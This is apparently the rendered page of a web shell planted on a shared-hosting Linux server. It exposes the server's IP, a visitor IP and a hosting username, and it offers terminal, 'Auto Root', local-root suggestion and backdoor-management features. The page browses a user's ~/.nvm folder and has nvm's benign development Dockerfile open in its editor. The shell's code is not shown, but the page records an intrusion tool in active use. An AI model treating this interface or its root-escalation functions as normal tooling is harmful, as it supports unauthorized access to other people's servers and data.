Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.64
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
.nvm /
Delete
Unzip
Name
Size
Permission
Date
Action
.cache
[ DIR ]
drwxrwxr-x
2025-06-22 16:21
.git
[ DIR ]
drwxrwxr-x
2025-06-22 16:20
.github
[ DIR ]
drwxrwxr-x
2025-06-22 16:20
alias
[ DIR ]
drwxrwxr-x
2025-06-22 16:25
test
[ DIR ]
drwxrwxr-x
2025-06-22 16:20
versions
[ DIR ]
drwxrwxr-x
2025-06-22 16:25
.dockerignore
155
B
-rw-rw-r--
2025-06-22 16:20
.editorconfig
658
B
-rw-rw-r--
2025-06-22 16:20
.gitattributes
19
B
-rw-rw-r--
2025-06-22 16:20
.gitignore
268
B
-rw-rw-r--
2025-06-22 16:20
.gitmodules
103
B
-rw-rw-r--
2025-06-22 16:20
.mailmap
51
B
-rw-rw-r--
2025-06-22 16:20
.npmrc
19
B
-rw-rw-r--
2025-06-22 16:20
.travis.yml
3.77
KB
-rw-rw-r--
2025-06-22 16:20
CODE_OF_CONDUCT.md
7.38
KB
-rw-rw-r--
2025-06-22 16:20
CONTRIBUTING.md
4.63
KB
-rw-rw-r--
2025-06-22 16:20
Dockerfile
3.52
KB
-rw-rw-r--
2025-06-22 16:20
GOVERNANCE.md
467
B
-rw-rw-r--
2025-06-22 16:20
LICENSE.md
1.09
KB
-rw-rw-r--
2025-06-22 16:20
Makefile
5.28
KB
-rw-rw-r--
2025-06-22 16:20
PROJECT_CHARTER.md
2.87
KB
-rw-rw-r--
2025-06-22 16:20
README.md
47.07
KB
-rw-rw-r--
2025-06-22 16:20
ROADMAP.md
882
B
-rw-rw-r--
2025-06-22 16:20
bash_completion
2.25
KB
-rw-rw-r--
2025-06-22 16:20
install.sh
16.17
KB
-rwxrwxr-x
2025-06-22 16:20
nvm-exec
371
B
-rwxrwxr-x
2025-06-22 16:20
nvm.sh
144.33
KB
-rwxrwxr-x
2025-06-22 16:20
package.json
2.32
KB
-rw-rw-r--
2025-06-22 16:20
rename_test.sh
1.21
KB
-rwxrwxr-x
2025-06-22 16:20
update_test_mocks.sh
2.42
KB
-rwxrwxr-x
2025-06-22 16:20
Save
Rename
# Dockerized nvm development environment # # This Dockerfile is for building nvm development environment only, # not for any distribution/production usage. # # Please note that it'll use about 1.2 GB disk space and about 15 minutes to # build this image, it depends on your hardware. FROM ubuntu:22.04 LABEL maintainer="Peter Dave Hello <hsu@peterdavehello.org>" LABEL name="nvm-dev-env" LABEL version="latest" # Set the SHELL to bash with pipefail option SHELL ["/bin/bash", "-o", "pipefail", "-c"] # Prevent dialog during apt install ENV DEBIAN_FRONTEND noninteractive # ShellCheck version ENV SHELLCHECK_VERSION=0.7.0 # Pick a Ubuntu apt mirror site for better speed # ref: https://launchpad.net/ubuntu/+archivemirrors ENV UBUNTU_APT_SITE ubuntu.cs.utah.edu # Replace origin apt package site with the mirror site RUN sed -E -i "s/([a-z]+.)?archive.ubuntu.com/$UBUNTU_APT_SITE/g" /etc/apt/sources.list RUN sed -i "s/security.ubuntu.com/$UBUNTU_APT_SITE/g" /etc/apt/sources.list # Install apt packages RUN apt update && \ apt upgrade -y -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" && \ apt install -y -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" \ coreutils \ util-linux \ bsdutils \ file \ openssl \ libssl-dev \ locales \ ca-certificates \ ssh \ wget \ patch \ sudo \ htop \ dstat \ vim \ tmux \ curl \ git \ jq \ zsh \ ksh \ gcc \ g++ \ xz-utils \ build-essential \ bash-completion && \ apt-get clean RUN wget https://github.com/koalaman/shellcheck/releases/download/v$SHELLCHECK_VERSION/shellcheck-v$SHELLCHECK_VERSION.linux.x86_64.tar.xz -O- | \ tar xJvf - shellcheck-v$SHELLCHECK_VERSION/shellcheck && \ mv shellcheck-v$SHELLCHECK_VERSION/shellcheck /bin && \ rmdir shellcheck-v$SHELLCHECK_VERSION RUN shellcheck -V # Set locale RUN locale-gen en_US.UTF-8 # Print tool versions RUN bash --version | head -n 1 RUN zsh --version RUN ksh --version || true RUN dpkg -s dash | grep ^Version | awk '{print $2}' RUN git --version RUN curl --version RUN wget --version # Add user "nvm" as non-root user RUN useradd -ms /bin/bash nvm # Copy and set permission for nvm directory COPY . /home/nvm/.nvm/ RUN chown nvm:nvm -R "/home/nvm/.nvm" # Set sudoer for "nvm" RUN echo 'nvm ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers # Switch to user "nvm" from now USER nvm # nvm RUN echo 'export NVM_DIR="$HOME/.nvm"' >> "$HOME/.bashrc" RUN echo '[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh" # This loads nvm' >> "$HOME/.bashrc" RUN echo '[ -s "$NVM_DIR/bash_completion" ] && . "$NVM_DIR/bash_completion" # This loads nvm bash_completion' >> "$HOME/.bashrc" # nodejs and tools RUN bash -c 'source $HOME/.nvm/nvm.sh && \ nvm install node && \ npm install -g doctoc urchin eclint dockerfile_lint && \ npm install --prefix "$HOME/.nvm/"' # Set WORKDIR to nvm directory WORKDIR /home/nvm/.nvm ENTRYPOINT ["/bin/bash"]